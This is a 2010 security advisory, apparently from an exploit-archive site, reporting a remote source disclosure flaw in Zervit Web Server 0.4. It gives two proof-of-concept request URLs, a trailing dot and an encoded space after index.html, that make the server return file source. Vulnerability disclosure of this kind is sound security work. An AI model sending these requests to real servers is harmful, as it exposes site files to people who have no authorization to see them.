Zervit Web Server 0.4 source disclosure

2010.05.15

Credit: Dr_IDE

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

###################################################################
#
# zervit Web Server v0.4 Source Disclosure/Download
# Found By:	Dr_IDE
# Date: 	May 12, 2010
# Download:	http://zervit.sourceforge.net/
# Tested on:	Windows 7
#
###################################################################

- Description -

zervit HTTP Server v0.4 is a Windows based HTTP server. This is the latest
version of the application available.

zervit HTTP Server is vulnerable to common remote source disclosure attacks. 

- Technical Details - (This is with Directory Listing = On or Off)

http://[ webserver IP][:port]index.html.		(Source Download)
http://[ webserver IP][:port]index.html%20		(Source Download)


#[pocoftheday.blogspot.com]

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Zervit Web Server 0.4 source disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.